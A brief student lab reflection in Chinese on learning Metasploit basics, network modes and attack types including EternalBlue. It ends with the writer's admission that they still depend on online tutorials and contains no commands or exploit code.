通过本次实验,我学会了网络连接的桥接模式、NAT模式的区别以及应用,了解了三种攻击方式:主动攻击、被动攻击——钓鱼网站、被动攻击——恶意文件,学会了MSF工具的一些常用指令,了解了它的六个模块的用法,掌握了如何在/usr/share/metasploit-framework/modules/exploits/路径下找到相应操作系统的相关漏洞,学会了运用一些辅助模块。
通过自己动手实践,对选择漏洞、进行攻击的过程有了进一步理解,但是觉得自己的掌握程度还有待提高。
离实战还缺些什么技术或步骤?
首先目前对某个漏洞的攻击还是针对与网上搜索的资料和步骤,而且通过永恒之蓝漏洞我发现msf只是攻击漏洞的一个工具,实际上还需要我们去修改一些文件或者几行代码,自己的能力还没发理解为什么要那么做,为什么要这么改,对已有攻击教程的依赖程度还比较高,所以想真正用好msf,搞懂怎么利用漏洞进行攻击还需要更多的主动性、目的性。
